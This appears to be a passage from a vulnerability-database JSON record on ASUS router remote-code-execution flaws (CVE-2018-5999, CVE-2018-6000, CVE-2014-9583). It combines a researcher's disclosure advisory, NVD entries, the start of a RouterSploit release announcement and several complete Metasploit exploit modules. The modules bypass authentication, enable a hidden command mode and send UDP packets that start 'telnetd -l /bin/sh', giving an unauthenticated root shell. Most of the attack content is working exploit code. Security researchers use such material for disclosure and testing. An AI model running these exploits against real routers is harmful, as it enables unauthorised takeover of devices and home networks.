\"\\x0C\" \n# PacketType [byte] ; NET_PACKET_TYPE_CMD \npkt << \"\\x15\" \n# OpCode [word] ; NET_CMD_ID_MANU_CMD \npkt << \"\\x33\\x00\" \n# Info [dword] ; Comment: \"Or Transaction ID\" \npkt << Rex::Text.rand_text_alphanumeric(4) \n# MacAddress [byte[6]] ; Double-wrongly \"checked\" with memcpy instead of memcmp \npkt << Rex::Text.rand_text_alphanumeric(6) \n# Password [byte[32]] ; Not checked at all \npkt << \"\\x00\" * 32 \n# Command Length + \\x00 + Command padded to 512 bytes \npkt << ([cmd.length].pack('C') + \"\\x00\" + cmd).ljust((512 - pkt.length), \"\\x00\") \nend \n \ndef exploit \nconnect_udp \nprint_status \"#{rhost} - Starting telnetd on port #{telnet_port}...\" \nudp_sock.put request \"telnetd -l /bin/sh -p #{telnet_port}\" \ndisconnect_udp \n \nvprint_status \"#{rhost} - Waiting for telnet service to start on port #{telnet_port}...\" \nRex.sleep 3 \n \nvprint_status \"#{rhost} - Connecting to #{rhost}:#{telnet_port}...\" \n \nsock = Rex::Socket.create_tcp 'PeerHost' => rhost, \n'PeerPort' => telnet_port, \n'Context' => { 'Msf' => framework, 'MsfExploit' => self }, \n'Timeout' => telnet_timeout \n \nif sock.nil? \nfail_with Failure::Unreachable, \"Telnet service unreachable on port #{telnet_port}\" \nend \n \nvprint_status \"#{rhost} - Trying to establish a telnet session...\" \n \nprompt = negotiate_telnet sock \nif prompt.nil? \nsock.close \nfail_with Failure::Unknown, 'Unable to establish a telnet session' \nend \n \nprint_good \"#{rhost} - Telnet session successfully established...\" \n \nhandler sock \nend \n \ndef negotiate_telnet(sock) \nprompt = '#' \nTimeout.timeout(datastore['TelnetBannerTimeout']) do \nwhile true \ndata = sock.get_once(-1, telnet_timeout) \nif !data or data.length == 0 \nreturn nil \nelsif data.include? prompt \nreturn true \nend \nend \nend \nrescue ::Timeout::Error \nreturn nil \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147284/asus_infosvr_auth_bypass_exec.rb.txt"}], "exploitdb": [{"lastseen": "2023-09-25T18:25:18", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T00:00:00", "type": "exploitdb", "title": "AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2018-5999", "2018-6000", "CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-22T00:00:00", "id": "EDB-ID:43881", "href": "https://www.exploit-db.com/exploits/43881", "sourceData": ">> Unauthenticated LAN remote code execution in AsusWRT\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\nDisclosure: 22/01/2018 / Last updated: 25/01/2018\r\n\r\n\r\n>> Background and summary\r\nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.\r\nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.\r\n\r\nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.\r\n\r\nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: HTTP server authentication bypass\r\nCVE-2018-5999\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.\r\nIn AsusWRT_source/router/httpd/httpd.c:\r\n\r\nhandle_request(void)\r\n{\r\n...\r\n\thandler->auth(auth_userid, auth_passwd, auth_realm);\r\n\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\r\n\r\n\tif (auth_result != 0) <--- auth fails\r\n\t{\r\n\t\tif(strcasecmp(method, \"post\") == 0){\r\n\t\t\tif (handler->input) {\r\n\t\t\t\thandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed\r\n\t\t\t}\r\n\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\r\n\t\t}\r\n\t\t//if(!fromapp) http_logout(login_ip_tmp, cookies);\r\n\t\treturn;\r\n\t}\r\n...\r\n}\r\n\r\nThis can (and will) be combined with other vulnerabilities to achieve remote code execution.\r\n\r\n\r\n#2\r\nVulnerability: Unauthorised configuration change (NVRAM value setting)\r\nCVE-2018-6000\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.\r\nIn AsusWRT_source/router/httpd/web.c:\r\n\r\ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary)\r\n{\r\n...\r\n\tif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) {\r\n\t\tif(strstr(post_buf, \"name=\\\"file\\\"\"))\r\n\t\t\tbreak;\r\n\t\telse if(strstr(post_buf, \"name=\\\"\")) {\r\n\t\t\toffset = strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= strlen(post_buf) - offset;\r\n\t\t\toffset = strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= strlen(post_buf) - offset;\r\n\t\t\tp = post_buf;\r\n\t\t\tname = strstr(p, \"\\\"\") + 1;\r\n\t\t\tp = strstr(name, \"\\\"\");\r\n\t\t\tstrcpy(p++, \"\\0\");\r\n\t\t\tvalue = strstr(p, \"\\r\\n\\r\\n\") + 4;\r\n\t\t\tp = strstr(value, \"\\r\");\r\n\t\t\tstrcpy(p, \"\\0\");\r\n\t\t\t//printf(\"%s=%s\\n\", name, value);\r\n\t\t\tnvram_set(name, value);\r\n\t\t}\r\n\t}\r\n...\r\n}\r\n\r\nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.\r\n\r\nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.\r\n\r\nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.\r\nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).\r\n\r\nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.\r\n\r\n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).\r\n\r\nPacket structure (from AsusWRT_source/router/shared/iboxcom.h):\r\n- Header\r\n typedef struct iboxPKTEx\r\n {\r\n BYTE\t\tServiceID;\r\n BYTE\t\tPacketType;\r\n WORD\t\tOpCode;\r\n DWORD \t\tInfo; // Or Transaction ID\r\n BYTE\t\tMacAddress[6];\r\n BYTE\t\tPassword[32]; //NULL terminated string, string length:1~31, cannot be NULL string\r\n } ibox_comm_pkt_hdr_ex;\r\n\r\n- Body\r\n typedef struct iboxPKTCmd\r\n {\r\n WORD\t\tlen;\r\n BYTE\t\tcmd[420];\t\t<--- command goes here\r\n } PKT_SYSCMD;\t\t// total 422 bytes\r\n\r\nA Metasploit module exploiting this vulnerability has been released [3].\r\n\r\n\r\n>> Fix:\r\nUpgrade to AsusWRT v3.0.0.4.384.10007 or above.\r\nSee [4] for the very few details and new firmware released by Asus.\r\n\r\n\r\n>> References:\r\n[1] https://blogs.securiteam.com/index.php/archives/3589\r\n[2] https://github.com/jduck/asus-cmd\r\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb\r\n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/raw/43881", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-09T16:09:48", "description": "The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a POST in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the POST request to enable a special command mode. This command mode can then be abused by sending a UDP packet to infosvr, which is running on port UDP 9999 to directly execute commands as root. This exploit leverages that to start telnetd in a random port, and then connects to it. It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.", "cvss3": {}, "published": "2018-02-23T00:00:00", "type": "zdt", "title": "AsusWRT LAN Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-02-23T00:00:00", "id": "1337DAY-ID-29883", "href": "https://0day.today/exploit/description/29883", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to\r\n perform a POST in certain cases. This can be combined with another vulnerability in\r\n the VPN configuration upload routine that sets NVRAM configuration variables directly\r\n from the POST request to enable a special command mode.\r\n This command mode can then be abused by sending a UDP packet to infosvr, which is running\r\n on port UDP 9999 to directly execute commands as root.\r\n This exploit leverages that to start telnetd in a random port, and then connects to it.\r\n It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <[email\u00a0protected]>' # Vulnerability discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],\r\n ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],\r\n ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],\r\n ['CVE', '2018-5999'],\r\n ['CVE', '2018-6000']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'AsusWRT < v3.0.0.4.384.10007',\r\n {\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find',\r\n },\r\n },\r\n }\r\n ],\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\r\n 'DisclosureDate' => 'Jan 22 2018',\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n Opt::RPORT(9999)\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80])\r\n ])\r\n end\r\n\r\n def exploit\r\n # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD\r\n # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = \"form-data; name=\\\"ateCommand_flag\\\"\")\r\n\r\n data = post_data.to_s\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/vpnupload.cgi\",\r\n 'method' => 'POST',\r\n 'rport' => datastore['ASUSWRTPORT'],\r\n 'data' => data,\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\r\n })\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - Successfully set the ateCommand_flag variable.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to set ateCommand_flag variable.\")\r\n end\r\n\r\n\r\n # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.\r\n info_pdu_size = 512 # expected packet size, not sure what the extra bytes are\r\n r = Random.new\r\n\r\n ibox_comm_pkt_hdr_ex =\r\n [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC\r\n [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15\r\n [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33\r\n r.bytes(4) + # Info, don't know what this is\r\n r.bytes(6) + # MAC address\r\n r.bytes(32) # Password\r\n\r\n telnet_port = rand((2**16)-1024)+1024\r\n cmd = \"/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}\" + [0x00].pack('C*')\r\n pkt_syscmd =\r\n [cmd.length,0x00].pack('C*') + # cmd length\r\n cmd # our command\r\n\r\n pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)\r\n\r\n connect_udp\r\n udp_sock.put(pkt_final) # we could process the response, but we don't care\r\n disconnect_udp\r\n\r\n print_status(\"#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}\")\r\n sleep(10)\r\n\r\n begin\r\n ctx = { 'Msf' => framework, 'MsfExploit' => self }\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 })\r\n if not sock.nil?\r\n print_good(\"#{peer} - Success, shell incoming!\")\r\n return handler(sock)\r\n end\r\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\r\n sock.close if sock\r\n end\r\n\r\n print_bad(\"#{peer} - Well that didn't work... try again?\")\r\n end\r\nend\n\n# 0day.today [2018-03-09] #", "sourceHref": "https://0day.today/exploit/29883", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-22T22:06:03", "description": "This Metasploit module exploits an authentication bypass vulnerability in the infosvr service running on UDP port 9999 on various ASUS routers to execute arbitrary commands as root. This Metasploit module launches the BusyBox Telnet daemon on the port specified in the TelnetPort option to gain an interactive remote shell. This Metasploit module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35. Numerous ASUS models are reportedly affected, but untested.", "cvss3": {}, "published": "2018-04-22T00:00:00", "type": "zdt", "title": "ASUS infosvr Authentication Bypass Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2018-04-22T00:00:00", "id": "1337DAY-ID-30222", "href": "https://0day.today/exploit/description/30222", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ASUS infosvr Auth Bypass Command Execution',\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in the\r\n infosvr service running on UDP port 9999 on various ASUS routers to\r\n execute arbitrary commands as root.\r\n\r\n This module launches the BusyBox Telnet daemon on the port specified\r\n in the TelnetPort option to gain an interactive remote shell.\r\n\r\n This module was tested successfully on an ASUS RT-N12E with firmware\r\n version 2.0.0.35.\r\n\r\n Numerous ASUS models are reportedly affected, but untested.\r\n },\r\n 'Author' =>\r\n [\r\n 'Friedrich Postelstorfer', # Initial public disclosure and Python exploit\r\n 'jduck', # Independent discovery and C exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'References' =>\r\n [\r\n ['CVE', '2014-9583'],\r\n ['EDB', '35688'],\r\n ['URL', 'https://github.com/jduck/asus-cmd']\r\n ],\r\n 'DisclosureDate' => 'Jan 4 2015',\r\n 'Privileged' => true,\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find'\r\n }\r\n },\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n Opt::RPORT(9999),\r\n OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),\r\n OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),\r\n OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])\r\n ]\r\n register_advanced_options [\r\n # If the session is killed (CTRL+C) rather than exiting cleanly,\r\n # the telnet port remains open, but is unresponsive, and prevents\r\n # re-exploitation until the device is rebooted.\r\n OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])\r\n ]\r\n end\r\n\r\n def telnet_timeout\r\n (datastore['TelnetTimeout'] || 10)\r\n end\r\n\r\n def telnet_port\r\n datastore['TelnetPort']\r\n end\r\n\r\n def request(cmd)\r\n pkt = ''\r\n # ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO\r\n pkt << \"\\x0C\"\r\n # PacketType [byte] ; NET_PACKET_TYPE_CMD\r\n pkt << \"\\x15\"\r\n # OpCode [word] ; NET_CMD_ID_MANU_CMD\r\n pkt << \"\\x33\\x00\"\r\n # Info [dword] ; Comment: \"Or Transaction ID\"\r\n pkt << Rex::Text.rand_text_alphanumeric(4)\r\n # MacAddress [byte[6]] ; Double-wrongly \"checked\" with memcpy instead of memcmp\r\n pkt << Rex::Text.rand_text_alphanumeric(6)\r\n # Password [byte[32]] ; Not checked at all\r\n pkt << \"\\x00\" * 32\r\n # Command Length + \\x00 + Command padded to 512 bytes\r\n pkt << ([cmd.length].pack('C') + \"\\x00\" + cmd).ljust((512 - pkt.length), \"\\x00\")\r\n end\r\n\r\n def exploit\r\n connect_udp\r\n print_status \"#{rhost} - Starting telnetd on port #{telnet_port}...\"\r\n udp_sock.put request \"telnetd -l /bin/sh -p #{telnet_port}\"\r\n disconnect_udp\r\n\r\n vprint_status \"#{rhost} - Waiting for telnet service to start on port #{telnet_port}...\"\r\n Rex.sleep 3\r\n\r\n vprint_status \"#{rhost} - Connecting to #{rhost}:#{telnet_port}...\"\r\n\r\n sock = Rex::Socket.create_tcp 'PeerHost' => rhost,\r\n 'PeerPort' => telnet_port,\r\n 'Context' => { 'Msf' => framework, 'MsfExploit' => self },\r\n 'Timeout' => telnet_timeout\r\n\r\n if sock.nil?\r\n fail_with Failure::Unreachable, \"Telnet service unreachable on port #{telnet_port}\"\r\n end\r\n\r\n vprint_status \"#{rhost} - Trying to establish a telnet session...\"\r\n\r\n prompt = negotiate_telnet sock\r\n if prompt.nil?\r\n sock.close\r\n fail_with Failure::Unknown, 'Unable to establish a telnet session'\r\n end\r\n\r\n print_good \"#{rhost} - Telnet session successfully established...\"\r\n\r\n handler sock\r\n end\r\n\r\n def negotiate_telnet(sock)\r\n prompt = '#'\r\n Timeout.timeout(datastore['TelnetBannerTimeout']) do\r\n while true\r\n data = sock.get_once(-1, telnet_timeout)\r\n if !data or data.length == 0\r\n return nil\r\n elsif data.include? prompt\r\n return true\r\n end\r\n end\r\n end\r\n rescue ::Timeout::Error\r\n return nil\r\n end\r\nend\n\n# 0day.today [2018-04-22] #", "sourceHref": "https://0day.today/exploit/30222", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-06-23T15:10:48", "description": "An issue was discovered in AsusWRT before 3.0.0.4.384_10007. The do_vpnupload_post function in router/httpd/web.c in vpnupload.cgi provides functionality for setting NVRAM configuration values, which allows attackers to set the admin password and launch an SSH daemon (or enable infosvr command mode), and consequently obtain remote administrative access, via a crafted request. This is available to unauthenticated attackers in conjunction with CVE-2018-5999.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T20:29:00", "type": "cve", "title": "CVE-2018-6000", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-6000", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6000", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-23T15:10:49", "description": "An issue was discovered in AsusWRT before 3.0.0.4.384_10007. In the handle_request function in router/httpd/httpd.c, processing of POST requests continues even if authentication fails.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T20:29:00", "type": "cve", "title": "CVE-2018-5999", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-5999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5999", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-08-16T07:27:50", "description": "common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change.", "cvss3": {}, "published": "2015-01-08T20:59:00", "type": "cve", "title": "CVE-2014-9583", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-10000", "CVE-2014-9583"], "modified": "2018-04-27T01:29:00", "cpe": ["cpe:/o:t-mobile:tm-ac1900:3.0.0.4.376_3169", "cpe:/o:asus:wrt_firmware:3.0.0.4.376_1071", "cpe:/o:asus:wrt_firmware:3.0.0.4.376.2524-g0012f52"], "id": "CVE-2014-9583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9583", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:asus:wrt_firmware:3.0.0.4.376_1071:*:*:*:*:*:*:*", "cpe:2.3:o:t-mobile:tm-ac1900:3.0.0.4.376_3169:*:*:*:*:*:*:*", "cpe:2.3:o:asus:wrt_firmware:3.0.0.4.376.2524-g0012f52:*:*:*:*:*:*:*"]}], "pentestit": [{"lastseen": "2018-10-18T18:23:37", "description": "PenTestIT RSS Feed\n\n**RouterSploit 3.4.0**, the long awaited [_router exploitation framework_](<http://pentestit.com/routersploit-router-exploitation-framework/>) update is out guys! This release includes some really cool features and updates such as using `pycryptodome` from `pycrypto`and newer exploitation modules! Read on for the improvements.\n\n![RouterSploit 3.4.0](http://pentestit.com/wp-content/uploads/2018/08/RouterSploit-3.3.0.png)\n\nWhat is RouterSploit?\n\n> The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following modules that aids penetration testing operations:\n> \n> * exploits \u2013 modules that take advantage of identified vulnerabilities\n> * creds \u2013 modules designed to test credentials against network services\n> * scanners \u2013 modules that check if a target is vulnerable to any exploit\n> * payloads \u2013 modules that are responsible for generating payloads for various architectures and injection points\n> * generic \u2013 modules that perform generic attacks\n\n## Official RouterSploit 3.4.0 changelog:\n\n * Fixing `setup.py` resources\n * Switching to pycroptodome\n * Fixing communication API\n * Adding `exploits/routers/asus/asuswrt_lan_rce.py` module (CVE-2018-5999/CVE-2018-6000)\n * Fixing `exploits/routers/asus/infosvr_backdoor_rce.py` module\n * Adding credentials used by Mirai botnet\n * Fixing 3com Officeconnect RCE module\n * Fixing `exploits/routers/billion/billion_5200w_rce.py` module\n * Fixing `exploits/routers/cisco/catalyst_2960_rocem.py` module (CVE-2017-3881)\n * Fixing `exploits/routers/cisco/firepower_management60_rce.py` module (CVE-2016-6433)\n * Fixing `exploits/routers/dlink/dir_815_850l_rce.py` module\n * Fixing `exploits/routers/multi/tcp_32764_rce.py` module\n * Fixing `exploits/routers/ubiquiti/airos_6_x.py` module\n * Adding `OptEncoder` option\n * Fixing `use` command issue\n * Adding tests `tests/exploits/cameras/cisco/test_video_surv_path_traversal.py`\n * Adding tests for modules default values\n * Adding tests `tests/exploits/routers/asus/test_infosvr_backdoor_rce.py`\n * Adding tests `tests/exploits/routers/billion/test_billion_5200w_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_firepower_management60_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_secure_acs_bypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py`\n * Adding tests `tests/exploits/routers/technicolor/test_tg784_authbypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py`\n * Fixing `exploits/routers/ipfire/ipfire_proxy_rce.py` module\n * Fixing `exploits/routers/ipfire/ipfire_shellshock.py` module\n * Adding `exploits/routers/linksys/eseries_themoon_rce.py` module\n\n## Install RouterSploit 3.4.0:\n\nIf you have an older version checked out, all you now need to get the latest version is run: `git pull` in the installed directory and you should be updated to the latest version. In case you do not have it installed, the current version is RouterSploit 3.4.0. Check out the [GIT repository](<https://github.com/threat9/routersploit>), and run\n \n \n pip3 install -r requirements.txt\n 